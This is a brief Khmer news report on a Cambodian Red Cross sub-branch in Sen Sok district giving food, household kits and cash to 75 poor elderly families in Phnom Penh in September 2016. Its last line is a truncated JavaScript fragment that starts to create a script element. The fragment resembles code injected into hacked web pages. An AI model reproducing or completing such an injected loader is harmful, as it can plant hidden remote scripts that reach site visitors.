ពលរដ្ឋក្រីក្រចាស់ជរាចំនួន៧៥គ្រួសារ នៅសង្កាត់ទឹកថ្លាទទួលអំណោយពីអនុសាខាកាកបាទក្រហមកម្ពុជា ខណ្ឌសែនសុខ(Video)
ភ្នំពេញ៖ នៅព្រឹកថ្ងៃទី០២ ខែកញ្ញា ឆ្នាំ២០១៦ លោក បឹុល កុសល ប្រធានកិត្តិយសអនុសាខាកាកបាទក្រហមកម្ពុជា ខណ្ឌ និងលោក សក់ ច័ន្ទកញ្ញារិទ្ធិ ប្រធានអនុសាខាកាកបាទក្រហមកម្ពុជា ខណ្ឌ បានដឹកនាំក្រុមការងារចុះសំណេះសំណាល សួរសុខទុក្ខ និងនាំយកអំណោយជាគ្រឿងឧបភោគបរិភោគ និងសម្ភារប្រើប្រាស់មួយចំនួនរបស់ សម្តេចកិតិ្តព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុន សែន ប្រធានកាកបាទក្រហមកម្ពុជា ទៅចែកជូនប្រជាពលរដ្ឋក្រីក្រចាស់ជរាចំនួន៧៥គ្រួសារ ស្ថិតនៅសង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ រាជធានីភ្នំពេញ។
នាឱកាសនោះ លោក បឹុល កុសល បានមានប្រសាសន៍ផ្តាំសួរសុខទុក្ខពីសំណាក់ សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិតប្រធានកាក បាទក្រហមកម្ពុជា ដែលជានិច្ចកាល សម្តេចគិតគូរពីសុខទុក្ខរបស់ប្រជាពលរដ្ឋគ្រប់ពេលវេលា។
អំណោយមនុស្សធម៌ដែលបានចែកជូន ក្នុង១គ្រួសារៗទទួលបាន៖ អង្ករ៣០គីឡូក្រាម មី១កេស ត្រីខ 1 យួរ ឃីត១មាន(មុង១ ភួយ១ សារុង១ ក្រមា១) និងថវិកាចំនួន20.000មឺុនរៀល ៕ ថវិកាលោកបុឹល កុសល ចំនួន 10.000រៀល និង លោក ពៅ ណារិទ្ធថវិកាចំនួន 10.000 រៀល ផងដែរ។
var d=document;var s=d.createElement(‘script’);